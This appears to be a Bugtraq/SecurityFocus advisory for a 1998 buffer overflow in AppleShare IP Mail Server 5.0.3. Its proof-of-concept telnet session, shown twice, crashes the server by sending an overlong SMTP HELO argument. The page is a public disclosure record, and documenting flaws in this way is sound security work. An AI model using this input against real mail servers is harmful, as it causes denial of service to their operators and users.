AppleShare IP Mail Server Buffer Overflow Vulnerability
BID:61
Info
AppleShare IP Mail Server Buffer Overflow Vulnerability
| Bugtraq ID: | 61 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-1999-1015 |
| Remote: | No |
| Local: | No |
| Published: | Apr 07 1998 12:00AM |
| Updated: | Jul 11 2009 12:16AM |
| Credit: | This vulnerability was published as "AppleShare IP Mail Server" by Chris Wedgwood <[email protected]> in the BugTraq mailing list on April 8, 1998. |
| Vulnerable: |
Apple AppleShare IP Mail Server 5.0.3 |
| Not Vulnerable: | |
Exploit / POC
AppleShare IP Mail Server Buffer Overflow Vulnerability
$ telnet some.where
Trying 1.2.3.4...
Connected to some.where.
Escape character is '^]'.
220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready
HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX
[ and it just hangs ]
$ ping some.where
[ ...nothing... ]
$ telnet some.where
Trying 1.2.3.4...
Connected to some.where.
Escape character is '^]'.
220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready
HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX
[ and it just hangs ]
$ ping some.where
[ ...nothing... ]
Solution / Fix
AppleShare IP Mail Server Buffer Overflow Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
AppleShare IP Mail Server Buffer Overflow Vulnerability
References:
References: